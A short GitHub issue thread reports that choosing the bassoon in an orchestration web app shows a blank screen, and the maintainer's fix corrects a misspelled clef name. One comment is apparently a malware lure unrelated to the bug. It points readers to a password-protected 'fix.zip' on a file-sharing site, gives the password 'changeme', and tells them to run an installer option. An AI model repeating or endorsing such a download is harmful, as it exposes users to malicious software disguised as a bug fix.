### ISSUE TITLE
Bassoon scale crashes app

### ISSUE THREAD

**Issue by rlane85** [Blane245/orchestration#8]
**Describe the bug**
Only white screen displayed when bassoon is selected

**To Reproduce**
1. Start app home
2. Change instrument to bassoon
3. ???
4. Profit

**Desktop (please complete the following information):**
 - OS: Windows 11
 - Browser: Edge

**Smartphone (please complete the following information):**
 - Device: iPhone 13
 - OS: iOS 17.5.1
 - Browser: Safari

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Blane245** [comment]
fixed bassoon clef name. Was base should have been bass
